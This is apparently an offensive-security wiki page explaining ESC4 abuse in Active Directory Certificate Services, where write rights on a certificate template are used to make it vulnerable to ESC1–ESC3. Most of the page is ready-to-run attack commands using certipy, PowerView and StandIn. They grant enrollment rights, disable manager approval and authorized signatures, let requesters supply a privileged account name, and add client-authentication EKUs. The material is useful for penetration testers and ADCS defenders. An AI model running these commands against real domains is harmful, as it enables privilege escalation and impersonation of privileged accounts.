ESC4
Performing ESC4 allows an attacker to introduce a misconfiguration to a template that is not vulnerable to begin with by abusing a certificate with overly-permissive ACLs; some rights that are critical for this abuse are:
Owner - Full Control
FullControl - Full Control
WriteOwner - Modify Owner for grant Full Control
WriteDacl - Modify access control for grant Full Control
WriteProperty - Edit any properties
In order to modify a template we need to modify these values:
Grant Enrollment rights for the vulnerable template
Disable the
PEND_ALL_REQUESTS
flag inmspki-enrollment-flag
to deactivate Manager ApprovalSet the
mspki-ra-signature
attribute to0
to disable theAuthorized Signature requirement
Enable the
ENROLLEE_SUPPLIES_SUBJECT
flag inmspki-certificate-name-flag
to allow requesting users to specify another privileged account name as aSAN
Set the
mspki-certificate-application-policy
to a certificate purpose for authentication:Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
Any Purpose (OID: 2.5.29.37.0)
No Extended Key Usage (EKU)
These are the steps we can take to abuse a certificate template vulnerable to ESC4: first we make the changes to the certificates we have ACLs on and save the old configuration so that we can revert the changes at a later time
certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -save-old
now the ESC4
certificate should be vulnerable to all ESC techniques from 1 to 4 (included)
certipy find -u otter -p 'SomethingSecure123!' -dc-ip 10.10.10.10 -vulnerable -stdout
<SNIP>
ESC1 : 'LAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2 : 'LAB.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3 : 'LAB.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4 : 'LAB.LOCAL\\Authenticated Users' has dangerous permissions
From this point on we can abuse any of the 3 misconfigurations (either ESC1, ESC2 or ESC3).
To revert the changes made to the certificate template we can use the JSON file generated with the previous certipy template
command
certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -configuration ESC4.json
The certipy template
command automates the process of setting up the misconfigurations completely but it's also possible to do it manually from a Windows host using the following commands and PowerView.
Add Certificate Enrollment Permissions to the
Domain Users
group
Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=domain,DC=com" -Verbose
Disable manager approval requirement by setting the
PEND_ALL_REQUESTS
flag to0x00000009
(0x00000001 + 0x00000008
forCT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
andCT_FLAG_PUBLISH_TO_DS
)
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-enrollment-flag'=9} -Verbose
Disable Authorized Signature Requirement by setting the
mspki-ra-signature
attribute to0
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-ra-signature'=0} -Verbose
Enabling SAN Specification making the template vulnerable to ESC1 by setting the ENROLLEE_SUPPLIES_SUBJECT flag to
1
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-name-flag'=1} -Verbose
Adding PKI Extended Key Usage EKU and
mspki-certificate-application-policy
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
We can also do the same thing with StandIn
, the following are the commands used to introduce a ESC1 misconfiguration into a certificate.
Adding
ENROLLEE_SUPPLIES_SUBJECT
.\StandIn.exe --ADCS --filter SecureUpdate --ess --add
Add Certificate Enrollment Permissions to the
Domain Users
group
.\StandIn.exe --ADCS --filter SecureUpdate --ntaccount
"DOMAIN\domain users" --enroll --add
Adding an EKU (in this case we'll use the Client Authentication EKU):
.\StandIn.exe --ADCS --filter SecureUpdate --clientauth --add
Last updated